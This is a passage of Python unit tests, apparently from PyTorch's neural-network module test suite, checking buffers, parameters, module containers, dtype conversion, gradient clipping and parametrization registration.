self.assertTrue(len(m.state_dict()) == 0)
m.buf = torch.rand(5)
self.assertTrue(len(list(m.buffers())) == 1)
self.assertTrue(len(m.state_dict()) == 0)
# Assigning a Parameter removes the buffer.
m.buf = nn.Parameter(torch.rand(5))
self.assertTrue(len(list(m.buffers())) == 0)
self.assertTrue(len(m.state_dict()) == 1)
def test_buffer_not_persistent_load(self):
m = nn.Module()
m.register_buffer('buf', torch.rand(5), persistent=False)
m.load_state_dict({})
def test_register_parameter_raises_error_if_name_is_not_string(self):
m = nn.Module()
expected_error = 'parameter name should be a string. Got '
with self.assertRaisesRegex(TypeError, expected_error + 'int'):
m.register_parameter(1, nn.Parameter())
with self.assertRaisesRegex(TypeError, expected_error + 'NoneType'):
m.register_parameter(None, nn.Parameter())
def test_register_parameter_raises_error_if_attr_exists(self):
m = nn.Module()
m.attribute_name = 5
with self.assertRaises(KeyError):
m.register_parameter('attribute_name', nn.Parameter())
del m.attribute_name
m.register_buffer('attribute_name', torch.rand(5))
with self.assertRaises(KeyError):
m.register_parameter('attribute_name', nn.Parameter())
del m.attribute_name
m.add_module('attribute_name', nn.Module())
with self.assertRaises(KeyError):
m.register_parameter('attribute_name', nn.Parameter())
def test_register_parameter_allows_overwriting_with_same_name(self):
m = nn.Module()
param1 = nn.Parameter(torch.rand(5))
param2 = nn.Parameter(param1.data + 5)
param3 = None
m.register_parameter('param_name', param1)
self.assertEqual(m.param_name, param1)
m.register_parameter('param_name', param2)
self.assertEqual(m.param_name, param2)
m.register_parameter('param_name', param3)
self.assertEqual(m.param_name, param3)
def test_add_module_raises_error_if_attr_exists(self):
m = nn.Module()
m.attribute_name = 5
with self.assertRaises(KeyError):
m.add_module('attribute_name', nn.Module())
del m.attribute_name
m.register_buffer('attribute_name', torch.rand(5))
with self.assertRaises(KeyError):
m.add_module('attribute_name', nn.Module())
del m.attribute_name
m.register_parameter('attribute_name', nn.Parameter())
with self.assertRaises(KeyError):
m.add_module('attribute_name', nn.Module())
@unittest.expectedFailure
def test_getattr_with_property(self):
class Model(nn.Module):
@property
def some_property(self):
return self.something_that_doesnt_exist
model = Model()
with self.assertRaisesRegex(
AttributeError,
r"'Model' object has no attribute 'something_that_doesnt_exist'"):
model.some_property
def test_Sequential_getitem(self):
l1 = nn.Linear(10, 20)
l2 = nn.Linear(20, 30)
l3 = nn.Linear(30, 40)
l4 = nn.Linear(40, 50)
n = nn.Sequential(l1, l2, l3, l4)
self.assertIs(n[0], l1)
self.assertIs(n[1], l2)
self.assertIs(n[2], l3)
self.assertIs(n[3], l4)
self.assertIs(n[torch.tensor(3, dtype=torch.int64)], l4)
self.assertEqual(n[1:], nn.Sequential(l2, l3, l4))
self.assertEqual(n[3:], nn.Sequential(l4))
self.assertEqual(n[:-1], nn.Sequential(l1, l2, l3))
self.assertEqual(n[:-3], nn.Sequential(l1))
self.assertEqual(n[::-1], nn.Sequential(l4, l3, l2, l1))
def test_Sequential_setitem(self):
l1 = nn.Linear(10, 20)
l2 = nn.Linear(20, 30)
l3 = nn.Linear(30, 40)
l4 = nn.Linear(40, 50)
n = nn.Sequential(l1, l2, l3)
n[0] = l4
n[-1] = l4
n[torch.tensor(1, dtype=torch.int16)] = l1
self.assertIs(n[0], l4)
self.assertIs(n[1], l1)
self.assertIs(n[2], l4)
def test_Sequential_setitem_named(self):
l1 = nn.Linear(10, 20)
l2 = nn.Linear(20, 30)
l3 = nn.Linear(30, 40)
l4 = nn.Linear(40, 50)
n = nn.Sequential(OrderedDict([
('linear1', l1),
('linear2', l2),
('linear3', l3),
]))
n[0] = l4
n[-1] = l4
self.assertEqual(n.linear1, l4)
self.assertEqual(n.linear3, l4)
def test_Sequential_delitem(self):
l1 = nn.Linear(10, 20)
l2 = nn.Linear(20, 30)
l3 = nn.Linear(30, 40)
l4 = nn.Linear(40, 50)
n = nn.Sequential(l1, l2, l3, l4)
del n[-1]
self.assertEqual(n, nn.Sequential(l1, l2, l3))
del n[1::2]
self.assertEqual(n, nn.Sequential(l1, l3))
def test_ModuleList(self):
modules = [nn.ReLU(), nn.Linear(5, 5)]
module_list = nn.ModuleList(modules)
def check():
self.assertEqual(len(module_list), len(modules))
for m1, m2 in zip(modules, module_list):
self.assertIs(m1, m2)
for m1, m2 in zip(modules, module_list.children()):
self.assertIs(m1, m2)
for i in range(len(modules)):
self.assertIs(module_list[i], modules[i])
check()
modules += [nn.Conv2d(3, 4, 3)]
module_list += [modules[-1]]
check()
modules.insert(1, nn.Linear(3, 2))
module_list.insert(1, modules[1])
check()
modules.append(nn.Tanh())
module_list.append(modules[-1])
check()
next_modules = [nn.Linear(5, 5), nn.Sigmoid()]
modules.extend(next_modules)
module_list.extend(next_modules)
check()
modules[2] = nn.Conv2d(5, 3, 2)
module_list[2] = modules[2]
check()
modules[-1] = nn.Conv2d(5, 2, 1)
module_list[-1] = modules[-1]
check()
idx = torch.tensor(2, dtype=torch.int32)
modules[2] = nn.Conv2d(5, 3, 2)
module_list[idx] = modules[2]
self.assertIs(module_list[idx], modules[2])
check()
self.assertEqual(module_list[1:], nn.ModuleList(modules[1:]))
self.assertEqual(module_list[3:], nn.ModuleList(modules[3:]))
self.assertEqual(module_list[:-1], nn.ModuleList(modules[:-1]))
self.assertEqual(module_list[:-3], nn.ModuleList(modules[:-3]))
self.assertEqual(module_list[::-1], nn.ModuleList(modules[::-1]))
del module_list[-1]
self.assertEqual(module_list, nn.ModuleList(modules[:-1]))
del module_list[1::2]
self.assertEqual(module_list, nn.ModuleList(modules[:-1][0::2]))
with self.assertRaises(TypeError):
module_list += nn.ReLU()
with self.assertRaises(TypeError):
module_list.extend(nn.ReLU())
l1 = nn.Linear(1, 2)
l2 = nn.Linear(2, 3)
l3 = nn.Linear(3, 2)
l4 = nn.Linear(2, 3)
subnet = nn.Sequential(l3, l4)
s = nn.Sequential(
OrderedDict([
("layer1", l1),
("layer2", l2),
("layer3", l3),
("layer4", l4),
("subnet_layer", subnet)
])
)
modules = list(s.modules())
module_list = nn.ModuleList()
module_list.extend(s.modules())
check()
# verify the right exception is thrown when trying to "forward" through a ModuleList
self.assertRaises(NotImplementedError, module_list)
self.assertRaises(NotImplementedError, module_list, torch.rand(1, 3))
def test_ModuleDict(self):
modules = OrderedDict([
('act', nn.ReLU()),
('conv', nn.Conv2d(10, 10, 5)),
('fc', nn.Linear(5, 5)),
])
module_dict = nn.ModuleDict(modules)
def check():
self.assertEqual(len(module_dict), len(modules))
for k1, m2 in zip(modules, module_dict.children()):
self.assertIs(modules[k1], m2)
for k1, k2 in zip(modules, module_dict):
self.assertIs(modules[k1], module_dict[k2])
for k in module_dict:
self.assertIs(module_dict[k], modules[k])
for k in module_dict.keys():
self.assertIs(module_dict[k], modules[k])
for k, v in module_dict.items():
self.assertIs(modules[k], v)
for k1, m2 in zip(modules, module_dict.values()):
self.assertIs(modules[k1], m2)
for k in modules.keys():
self.assertTrue(k in module_dict)
check()
modules['conv'] = nn.Conv2d(3, 4, 3)
module_dict['conv'] = modules['conv']
check()
next_modules = [
('fc2', nn.Linear(5, 5)),
('act', nn.Sigmoid()),
]
modules.update(next_modules)
module_dict.update(next_modules)
check()
next_modules = OrderedDict([
('fc3', nn.Linear(5, 5)),
('act2', nn.Sigmoid()),
])
modules.update(next_modules)
module_dict.update(next_modules)
check()
next_modules = {
'fc4': nn.Linear(5, 5),
'act3': nn.Sigmoid()
}
modules.update(next_modules.items())
module_dict.update(next_modules)
check()
next_modules = nn.ModuleDict([
('fc5', nn.Linear(5, 5)),
('act4', nn.Sigmoid()),
])
modules.update(next_modules)
module_dict.update(next_modules)
check()
del module_dict['fc']
del modules['fc']
check()
with self.assertRaises(TypeError):
module_dict.update(nn.ReLU())
with self.assertRaises(TypeError):
module_dict.update([nn.ReLU()])
with self.assertRaises(ValueError):
module_dict.update([[nn.ReLU()]])
with self.assertRaises(TypeError):
module_dict[1] = nn.ReLU()
s = nn.Sequential(modules)
module_dict = nn.ModuleDict(s.named_children())
check()
c = module_dict.pop('conv')
self.assertIs(c, modules['conv'])
modules.pop('conv')
check()
module_dict.clear()
self.assertEqual(len(module_dict), 0)
modules.clear()
check()
# verify the right exception is thrown when trying to "forward" through a ModuleDict
self.assertRaises(NotImplementedError, module_dict)
self.assertRaises(NotImplementedError, module_dict, torch.rand(1, 3))
def test_ParameterList(self):
def make_param():
return Parameter(torch.randn(10, 10))
parameters = [make_param(), make_param()]
param_list = nn.ParameterList(parameters)
def check():
self.assertEqual(len(parameters), len(param_list))
for p1, p2 in zip(parameters, param_list):
self.assertIs(p1, p2)
for p1, p2 in zip(parameters, param_list.parameters()):
self.assertIs(p1, p2)
for i in range(len(parameters)):
self.assertIs(parameters[i], param_list[i])
check()
parameters += [make_param()]
param_list += [parameters[-1]]
check()
parameters.append(make_param())
param_list.append(parameters[-1])
check()
next_params = [make_param(), make_param()]
parameters.extend(next_params)
param_list.extend(next_params)
check()
parameters[2] = make_param()
param_list[2] = parameters[2]
check()
parameters[-1] = make_param()
param_list[-1] = parameters[-1]
check()
idx = torch.tensor(2, dtype=torch.int32)
parameters[2] = make_param()
param_list[idx] = parameters[2]
self.assertIs(param_list[idx], parameters[2])
check()
self.assertEqual(param_list[1:], nn.ParameterList(parameters[1:]))
self.assertEqual(param_list[3:], nn.ParameterList(parameters[3:]))
self.assertEqual(param_list[:-1], nn.ParameterList(parameters[:-1]))
self.assertEqual(param_list[:-3], nn.ParameterList(parameters[:-3]))
self.assertEqual(param_list[::-1], nn.ParameterList(parameters[::-1]))
with self.assertRaises(TypeError):
param_list += make_param()
with self.assertRaises(TypeError):
param_list.extend(make_param())
l1 = nn.Linear(1, 2)
l2 = nn.Linear(2, 3)
l3 = nn.Linear(3, 2)
l4 = nn.Linear(2, 3)
subnet = nn.Sequential(l3, l4)
s = nn.Sequential(
OrderedDict([
("layer1", l1),
("layer2", l2),
("layer3", l3),
("layer4", l4),
("subnet_layer", subnet)
])
)
parameters = list(s.parameters())
param_list = nn.ParameterList()
param_list.extend(s.parameters())
check()
def test_ParameterDict(self):
parameters = OrderedDict([
('p1', Parameter(torch.randn(10, 10))),
('p2', Parameter(torch.randn(10, 10))),
('p3', Parameter(torch.randn(10, 10))),
])
parameter_dict = nn.ParameterDict(parameters)
def check():
self.assertEqual(len(parameter_dict), len(parameters))
for k1, m2 in zip(parameters, parameter_dict.parameters()):
self.assertIs(parameters[k1], m2)
for k1, k2 in zip(parameters, parameter_dict):
self.assertIs(parameters[k1], parameter_dict[k2])
for k in parameter_dict:
self.assertIs(parameter_dict[k], parameters[k])
for k in parameter_dict.keys():
self.assertIs(parameter_dict[k], parameters[k])
for k, v in parameter_dict.items():
self.assertIs(v, parameters[k])
for k1, m2 in zip(parameters, parameter_dict.values()):
self.assertIs(parameters[k1], m2)
for k in parameters.keys():
self.assertTrue(k in parameter_dict)
check()
parameters['p4'] = Parameter(torch.randn(10, 10))
parameter_dict['p4'] = parameters['p4']
check()
next_parameters = [
('p5', Parameter(torch.randn(10, 10))),
('p2', Parameter(torch.randn(10, 10))),
]
parameters.update(next_parameters)
parameter_dict.update(next_parameters)
check()
next_parameters = OrderedDict([
('p6', Parameter(torch.randn(10, 10))),
('p5', Parameter(torch.randn(10, 10))),
])
parameters.update(next_parameters)
parameter_dict.update(next_parameters)
check()
next_parameters = {
'p8': Parameter(torch.randn(10, 10)),
'p7': Parameter(torch.randn(10, 10))
}
parameters.update(sorted(next_parameters.items()))
parameter_dict.update(next_parameters)
check()
next_parameters = nn.ParameterDict([
('p10', Parameter(torch.randn(10, 10))),
('p9', Parameter(torch.randn(10, 10))),
])
parameters.update(next_parameters)
parameter_dict.update(next_parameters)
check()
del parameter_dict['p3']
del parameters['p3']
check()
with self.assertRaises(TypeError):
parameter_dict.update(1)
with self.assertRaises(TypeError):
parameter_dict.update([1])
with self.assertRaises(ValueError):
parameter_dict.update(Parameter(torch.randn(10, 10)))
with self.assertRaises(TypeError):
parameter_dict[1] = Parameter(torch.randn(10, 10))
p_pop = parameter_dict.pop('p4')
self.assertIs(p_pop, parameters['p4'])
parameters.pop('p4')
check()
parameter_dict.clear()
self.assertEqual(len(parameter_dict), 0)
parameters.clear()
check()
def test_add_module(self):
l = nn.Linear(10, 20)
net = nn.Module()
net.l = l
net.l2 = l
net.add_module('empty', None)
self.assertEqual(net.l, l)
self.assertEqual(net.l2, l)
self.assertEqual(net.empty, None)
net.add_module('l3', l)
self.assertEqual(net.l3, l)
l3 = nn.Linear(20, 10)
net.add_module('l', l3)
self.assertEqual(net.l, l3)
self.assertRaises(TypeError, lambda: net.add_module('x', 'non-module'))
self.assertRaisesRegex(TypeError, 'module name should be a string. Got int',
lambda: net.add_module(1, l))
self.assertRaisesRegex(TypeError, 'module name should be a string. Got NoneType',
lambda: net.add_module(None, l))
def test_module_to_argparse(self):
net = nn.Sequential(nn.Linear(3, 3))
cpu = torch.device('cpu')
with self.assertRaises(TypeError):
net.to(cpu, True)
with self.assertRaises(TypeError):
net.to(torch.long)
with self.assertRaises(TypeError):
net.to(None, True)
with self.assertRaises(TypeError):
net.to(cpu, torch.long, True)
with self.assertRaises(TypeError):
net.to(cpu, dtype=torch.long, non_blocking=True)
with self.assertRaises(TypeError):
net.to([])
with self.assertRaises(TypeError):
net.to({}, non_blocking=True)
with self.assertRaises(TypeError):
net.to(torch.tensor(3, dtype=torch.long), non_blocking=True)
with self.assertRaises(TypeError):
net.to(cpu, torch.tensor(3, dtype=torch.long), non_blocking=True)
def test_RNN_nonlinearity(self):
rnn = torch.nn.RNN(1, 10)
self.assertEqual(rnn.nonlinearity, 'tanh')
rnn = torch.nn.RNN(1, 10, nonlinearity='relu')
self.assertEqual(rnn.nonlinearity, 'relu')
with self.assertRaisesRegex(ValueError, 'Unknown nonlinearity'):
rnn = torch.nn.RNN(1, 10, nonlinearity='garbage')
def test_module_apply_inplace_op(self):
def add_one_inplace(t):
return t.add_(1.0)
# Test that applying an in-place operation to a module would bump
# the module's parameters' version counter.
m = nn.Linear(20, 10)
pvm = m.weight.mul(m.weight)
m_weight_version_saved = m.weight._version
m = m._apply(add_one_inplace)
self.assertGreater(m.weight._version, m_weight_version_saved)
with self.assertRaisesRegex(RuntimeError, "modified by an inplace operation"):
pvm.backward(torch.randn(10, 20))
# Test that applying an in-place operation to a module would bump
# the module's parameters' gradients' version counter.
m = nn.Linear(20, 10)
m.weight.grad = torch.randn(10, 20).requires_grad_()
pgm = m.weight.grad.mul(m.weight.grad)
m_weight_grad_version_saved = m.weight.grad._version
m = m._apply(add_one_inplace)
self.assertGreater(m.weight.grad._version, m_weight_grad_version_saved)
with self.assertRaisesRegex(RuntimeError, "modified by an inplace operation"):
pgm.backward(torch.randn(10, 20))
def test_overwrite_module_params_on_conversion(self):
# Test that if the conversion function passed to `module._apply()`
# changes the TensorImpl type of `module`'s parameters, the `module`'s
# parameters are always overwritten, regardless of the value of
# `torch.__future__.get_overwrite_module_params_on_conversion()`.
m = nn.Linear(20, 10)
m.weight.grad = torch.randn(10, 20)
weight_ref = m.weight
weight_grad_ref = m.weight.grad
m = m._apply(lambda t: torch.sparse_coo_tensor(torch.zeros([2, 1]), torch.ones([1]), torch.Size([10, 20])))
self.assertNotEqual(weight_ref.layout, m.weight.layout)
self.assertNotEqual(weight_grad_ref.layout, m.weight.grad.layout)
# Test that under the current default settings
# (`torch.__future__.get_overwrite_module_params_on_conversion() == False`),
# a view to a module's parameters is not pointing to the same storage as
# its base variable after converting the module to a different dtype.
m = nn.Linear(20, 10).float()
mw = m.weight[:]
m.double()
with torch.no_grad():
mw[0][0] = 5
self.assertTrue(mw[0][0].dtype == torch.float)
self.assertTrue(mw._base[0][0].dtype == torch.double)
try:
torch.__future__.set_overwrite_module_params_on_conversion(True)
# Test that if `torch.__future__.get_overwrite_module_params_on_conversion() == True`,
# a view to a module's parameters is still pointing to the same storage as
# its base variable after converting the module to a different dtype.
m = nn.Linear(20, 10).float()
mw = m.weight[:]
m.double()
with torch.no_grad():
mw[0][0] = 5
self.assertTrue(mw[0][0] == mw._base[0][0])
# Test that if `torch.__future__.get_overwrite_module_params_on_conversion() == True`,
# `float_module.double()` doesn't preserve previous references to
# `float_module`'s parameters or gradients.
m = nn.Linear(20, 10).float()
m.weight.grad = torch.randn(10, 20).float()
weight_ref = m.weight
weight_grad_ref = m.weight.grad
m.double()
self.assertNotEqual(weight_ref.dtype, m.weight.dtype)
self.assertNotEqual(weight_grad_ref.dtype, m.weight.grad.dtype)
def add_one_inplace(t):
return t.add_(1.0)
# Test that if `torch.__future__.get_overwrite_module_params_on_conversion() == True`,
# applying an in-place operation to a module would bump the module's
# original parameters' version counter.
m = nn.Linear(20, 10)
pvm = m.weight.mul(m.weight)
weight_ref = m.weight
m_weight_version_saved = weight_ref._version
m = m._apply(add_one_inplace)
# Test that the in-place operation bumps the original parameter's version counter
self.assertGreater(weight_ref._version, m_weight_version_saved)
with self.assertRaisesRegex(RuntimeError, "modified by an inplace operation"):
pvm.backward(torch.randn(10, 20))
# Test that if `torch.__future__.get_overwrite_module_params_on_conversion() == True`,
# applying an in-place operation to a module would bump the module's
# original parameters' gradients' version counter.
m = nn.Linear(20, 10)
m.weight.grad = torch.randn(10, 20).requires_grad_()
pgm = m.weight.grad.mul(m.weight.grad)
weight_grad_ref = m.weight.grad
m_weight_grad_version_saved = weight_grad_ref._version
m = m._apply(add_one_inplace)
self.assertGreater(weight_grad_ref._version, m_weight_grad_version_saved)
with self.assertRaisesRegex(RuntimeError, "modified by an inplace operation"):
pgm.backward(torch.randn(10, 20))
# Test that if `torch.__future__.get_overwrite_module_params_on_conversion() == True`,
# applying an out-of-place operation to a module doesn't bump
# the module's original parameters' version counter.
m = nn.Linear(20, 10)
weight_ref = m.weight
m_weight_version_saved = weight_ref._version
m = m._apply(lambda t: torch.randn(t.shape))
self.assertEqual(weight_ref._version, m_weight_version_saved)
# Test that if `torch.__future__.get_overwrite_module_params_on_conversion() == True`,
# applying an out-of-place operation to a module doesn't bump
# the module's original parameters' gradients' version counter.
m = nn.Linear(20, 10)
m.weight.grad = torch.randn(10, 20).requires_grad_()
weight_grad_ref = m.weight.grad
m_weight_grad_version_saved = weight_grad_ref._version
m = m._apply(lambda t: torch.randn(t.shape))
self.assertEqual(weight_grad_ref._version, m_weight_grad_version_saved)
finally:
torch.__future__.set_overwrite_module_params_on_conversion(False)
def test_type(self):
l = nn.Linear(10, 20)
net = nn.Module()
net.l = l
net.l2 = l
net.add_module('empty', None)
net.register_buffer('indices', torch.LongTensor(1))
net.float()
self.assertIsInstance(l.weight.data, torch.FloatTensor)
self.assertIsInstance(l.bias.data, torch.FloatTensor)
self.assertIsInstance(net.indices, torch.LongTensor)
net.double()
self.assertIsInstance(l.weight.data, torch.DoubleTensor)
self.assertIsInstance(l.bias.data, torch.DoubleTensor)
self.assertIsInstance(net.indices, torch.LongTensor)
net.to(torch.half)
self.assertIsInstance(l.weight.data, torch.HalfTensor)
self.assertIsInstance(l.bias.data, torch.HalfTensor)
self.assertIsInstance(net.indices, torch.LongTensor)
if TEST_CUDA:
net.float().cuda()
self.assertIsInstance(l.weight.data, torch.cuda.FloatTensor)
self.assertIsInstance(l.bias.data, torch.cuda.FloatTensor)
self.assertIsInstance(net.indices, torch.cuda.LongTensor)
net.cpu()
self.assertIsInstance(l.weight.data, torch.FloatTensor)
self.assertIsInstance(l.bias.data, torch.FloatTensor)
self.assertIsInstance(net.indices, torch.LongTensor)
net.to("cuda", torch.double, True)
self.assertIsInstance(l.weight.data, torch.cuda.DoubleTensor)
self.assertIsInstance(l.bias.data, torch.cuda.DoubleTensor)
self.assertIsInstance(net.indices, torch.cuda.LongTensor)
net.to(torch.empty(1, device="cuda:0", dtype=torch.half))
self.assertIsInstance(l.weight.data, torch.cuda.HalfTensor)
self.assertIsInstance(l.bias.data, torch.cuda.HalfTensor)
self.assertIsInstance(net.indices, torch.cuda.LongTensor)
net.to(torch.device("cpu"), non_blocking=True)
self.assertIsInstance(l.weight.data, torch.HalfTensor)
self.assertIsInstance(l.bias.data, torch.HalfTensor)
self.assertIsInstance(net.indices, torch.LongTensor)
net.to(torch.float)
self.assertIsInstance(l.weight.data, torch.FloatTensor)
self.assertIsInstance(l.bias.data, torch.FloatTensor)
net.to(torch.DoubleTensor(1))
self.assertIsInstance(l.weight.data, torch.DoubleTensor)
self.assertIsInstance(l.bias.data, torch.DoubleTensor)
if TEST_CUDA:
net.to(device='cuda', dtype=torch.float)
self.assertIsInstance(l.weight.data, torch.cuda.FloatTensor)
self.assertIsInstance(l.bias.data, torch.cuda.FloatTensor)
def test_non_leaf_parameters(self):
l1 = nn.Linear(10, 10)
l2 = nn.Linear(10, 10)
def assign_weight():
l2.weight = l1.weight + 2
self.assertRaises(TypeError, assign_weight)
# This should work though
l2.weight = Parameter(torch.randn(10, 10))
def test_clip_grad_norm(self):
l = nn.Linear(10, 10)
max_norm = 2
def compute_norm(norm_type):
norm_type = float(norm_type)
if norm_type != inf:
total_norm = 0
for p in l.parameters():
total_norm += p.grad.data.abs().pow(norm_type).sum()
return pow(total_norm, 1. / norm_type)
else:
return max(p.grad.data.abs().max() for p in l.parameters())
def compare_scaling(grads):
p_scale = [p.grad.data.div(g).view(-1) for p, g in zip(l.parameters(), grads)]
scale = torch.cat(p_scale)
self.assertEqual(scale.std(), 0)
return scale[0]
grads = torch.arange(1., 101).view(10, 10), torch.ones(10).div(1000)
for norm_type in [0.5, 1.5, 2, 4, 'inf']:
for p, g in zip(l.parameters(), grads):
p._grad = g.clone().view_as(p.data)
norm_before = compute_norm(norm_type)
norm = clip_grad_norm_(l.parameters(), max_norm, norm_type=norm_type)
norm_after = compute_norm(norm_type)
self.assertEqual(norm, norm_before)
self.assertEqual(norm_after, max_norm)
self.assertLessEqual(norm_after, norm_before)
compare_scaling(grads)
# Small gradients should be left unchanged
grads = torch.rand(10, 10).div(10000), torch.ones(10).div(500)
for norm_type in [0.5, 1.5, 2, 4, 'inf']:
for p, g in zip(l.parameters(), grads):
p.grad.data.copy_(g)
norm_before = compute_norm(norm_type)
norm = clip_grad_norm_(l.parameters(), max_norm, norm_type=norm_type)
norm_after = compute_norm(norm_type)
self.assertEqual(norm, norm_before)
self.assertEqual(norm_before, norm_after)
self.assertLessEqual(norm_after, max_norm)
scale = compare_scaling(grads)
self.assertEqual(scale, 1)
# Should accept a single Tensor as input
p1, p2 = torch.randn(10, 10), torch.randn(10, 10)
g = torch.arange(1., 101).view(10, 10)
p1._grad = g.clone()
p2._grad = g.clone()
for norm_type in [0.5, 1.5, 2, 4, 'inf']:
clip_grad_norm_(p1, max_norm, norm_type=norm_type)
clip_grad_norm_([p2], max_norm, norm_type=norm_type)
self.assertEqual(p1.grad, p2.grad)
def test_clip_grad_value(self):
l = nn.Linear(10, 10)
clip_value = 2.5
grad_w, grad_b = torch.arange(-50., 50).view(10, 10).div_(5), torch.ones(10).mul_(2)
for grad_list in [[grad_w, grad_b], [grad_w, None]]:
for p, g in zip(l.parameters(), grad_list):
p._grad = g.clone().view_as(p.data) if g is not None else g
clip_grad_value_(l.parameters(), clip_value)
for p in filter(lambda p: p.grad is not None, l.parameters()):
self.assertLessEqual(p.grad.data.max(), clip_value)
self.assertGreaterEqual(p.grad.data.min(), -clip_value)
# Should accept a single Tensor as input
p1, p2 = torch.randn(10, 10), torch.randn(10, 10)
g = torch.arange(-50., 50).view(10, 10).div_(5)
p1._grad = g.clone()
p2._grad = g.clone()
clip_grad_value_(p1, clip_value)
clip_grad_value_([p2], clip_value)
self.assertEqual(p1.grad, p2.grad)
def test_parameters_to_vector(self):
conv1 = nn.Conv2d(3, 10, 5)
fc1 = nn.Linear(10, 20)
model = nn.Sequential(conv1, fc1)
vec = parameters_to_vector(model.parameters())
self.assertEqual(vec.size(0), 980)
def test_vector_to_parameters(self):
conv1 = nn.Conv2d(3, 10, 5)
fc1 = nn.Linear(10, 20)
model = nn.Sequential(conv1, fc1)
vec = torch.arange(0., 980)
vector_to_parameters(vec, model.parameters())
sample = next(model.parameters())[0, 0, 0]
self.assertTrue(torch.equal(sample.data, vec.data[:5]))
# torch/nn/utils/parametrize
def test_register_and_remove_parametrization(self):
r"""Test that it is possible to add a few parametrizations
on a parameter or a buffer and that removing them restores the initial state
It also tests that backpropagating through them works as expected
"""
# Define a couple matrix parametrizations
class Skew(nn.Module):
def forward(self, X):
X = X.tril(-1)
return X - X.T
class Orthogonal(nn.Module):
def forward(self, X):
# Cayley map
# If X is skew-symmetric it returns an orthogonal matrix
Id = torch.eye(X.size(0), device=X.device)
# We call contiguous because solve returns a tensor with strides that are Fortran-contiguous
# and autograd raises a performance warning.
# This happens when we remove the parametrization with leave_parametrized=True,
# which does a set_ with a non-contiguous tensor while the gradient is contiguous
return torch.linalg.solve(Id + X, Id - X).contiguous()
class Resize(nn.Module):
def forward(self, X):
return X[[0]]
class NoResize(nn.Module):
def forward(self, X):
return X
# Define a couple vector parametrizations
class FirstZero(nn.Module):
def forward(self, x):
return torch.cat([x.new_zeros(1), x[1:]])
class LastZero(nn.Module):
def forward(self, x):
return torch.cat([x[:-1], x.new_zeros(1)])
model = nn.Linear(8, 8)
initial_weight_id = id(model.weight)
initial_bias_id = id(model.bias)
initial_model = deepcopy(model)
# Test unsafe flag
with self.assertRaisesRegex(ValueError, "Registering a parametrization may not change the shape of the tensor"):
parametrize.register_parametrization(model, "weight", Resize()) # default unsafe = False
model(torch.ones(8, 8))
# One parametrization with unsafe=True
parametrize.register_parametrization(model, "weight", Resize(), unsafe=True)
self.assertTrue(hasattr(model, "parametrizations"))
self.assertTrue(parametrize.is_parametrized(model))
self.assertTrue(parametrize.is_parametrized(model, "weight"))
self.assertFalse(parametrize.is_parametrized(model, "bias"))
self.assertNotIn("weight", model._parameters)
A = model.weight
self.assertTrue(A.shape[0] == 1)
parametrize.remove_parametrizations(model, "weight", leave_parametrized=False)
self.assertFalse(hasattr(model, "parametrizations"))
self.assertEqual(model.weight, initial_model.weight)
self.assertEqual(id(model.weight), initial_weight_id)
self.assertEqual(model.__class__, nn.Linear)
# Two parametrizations with unsafe=True
parametrize.register_parametrization(model, "weight", Resize(), unsafe=True)
parametrize.register_parametrization(model, "weight", NoResize(), unsafe=False)
self.assertTrue(hasattr(model, "parametrizations"))
self.assertTrue(parametrize.is_parametrized(model))
self.assertTrue(parametrize.is_parametrized(model, "weight"))
self.assertFalse(parametrize.is_parametrized(model, "bias"))
self.assertNotIn("weight", model._parameters)
A = model.weight
self.assertTrue(A.shape[0] == 1)
parametrize.remove_parametrizations(model, "weight", leave_parametrized=False)
self.assertFalse(hasattr(model, "parametrizations"))
self.assertEqual(model.weight, initial_model.weight)
self.assertEqual(id(model.weight), initial_weight_id)
self.assertEqual(model.__class__, nn.Linear)
# Test unsafe flag doesn't change expected behavior
parametrize.register_parametrization(model, "weight", Skew(), unsafe=True)
self.assertTrue(hasattr(model, "parametrizations"))
self.assertTrue(parametrize.is_parametrized(model))
self.assertTrue(parametrize.is_parametrized(model, "weight"))
self.assertFalse(parametrize.is_parametrized(model, "bias"))
self.assertNotIn("weight", model._parameters)
# Result should be skew-symmetric
A = model.weight
self.assertEqual(A, -A.T)
# Remove and check consistency
parametrize.remove_parametrizations(model, "weight", leave_parametrized=False)
self.assertFalse(hasattr(model, "parametrizations"))
self.assertEqual(model.weight, initial_model.weight)
self.assertEqual(id(model.weight), initial_weight_id)
self.assertEqual(model.__class__, nn.Linear)
# Test one parametrization
parametrize.register_parametrization(model, "weight", Skew())
self.assertTrue(hasattr(model, "parametrizations"))
self.assertTrue(parametrize.is_parametrized(model))
self.assertTrue(parametrize.is_parametrized(model, "weight"))
self.assertFalse(parametrize.is_parametrized(model, "bias"))
self.assertNotIn("weight", model._parameters)
# Result should be skew-symmetric
A = model.weight
self.assertEqual(A, -A.T)
# Remove and check consistency
parametrize.remove_parametrizations(model, "weight", leave_parametrized=False)
self.assertFalse(hasattr(model, "parametrizations"))
self.assertEqual(model.weight, initial_model.weight)
self.assertEqual(id(model.weight), initial_weight_id)
self.assertEqual(model.__class__, nn.Linear)
# Test two parametrizations at the same time and removing them
parametrize.register_parametrization(model, "weight", Skew())
parametrize.register_parametrization(model, "weight", Orthogonal())
# Result should be orthogonal
X = model.weight
Id = torch.eye(X.size(0), device=X.device)
self.assertEqual(X.T @ X, Id)
# Structure tests
self.assertTrue(hasattr(model, "parametrizations"))
self.assertTrue(parametrize.is_parametrized(model))
self.assertTrue(parametrize.is_parametrized(model, "weight"))
self.assertFalse(parametrize.is_parametrized(model, "bias"))
self.assertIn("weight", model.parametrizations)
self.assertNotIn("weight", model._parameters)
# Remove
parametrize.remove_parametrizations(model, "weight", leave_parametrized=False)
self.assertEqual(model.weight, initial_model.weight)
self.assertEqual(id(model.weight), initial_weight_id)
self.assertFalse(hasattr(model, "parametrizations"))
self.assertEqual(model.__class__, nn.Linear)
# Add everything
parametrize.register_parametrization(model, "weight", Skew())
parametrize.register_parametrization(model, "weight", Orthogonal())
parametrize.register_parametrization(model, "bias", FirstZero())
parametrize.register_parametrization(model, "bias", LastZero())
# Basic tests
self.assertTrue(parametrize.is_parametrized(model))
self.assertTrue(parametrize.is_parametrized(model, "weight"))
self.assertTrue(parametrize.is_parametrized(model, "bias"))
self.assertEqual(model.bias[0].item(), 0.)
self.assertEqual(model.bias[-1].item(), 0.)
self.assertEqual(len(list(model.parameters())), 2) # Nothing weird has happpened
# Should not throw
sgd = torch.optim.SGD(model.parameters(), lr=0.01)
weight_copy = model.weight.clone()
bias_copy = model.bias.clone()
sgd.zero_grad()
(model.weight.T @ model.bias).sum().backward()
sgd.step()
self.assertNotEqual(model.weight, weight_copy)
self.assertNotEqual(model.bias, bias_copy)
# Remove first parametrization.
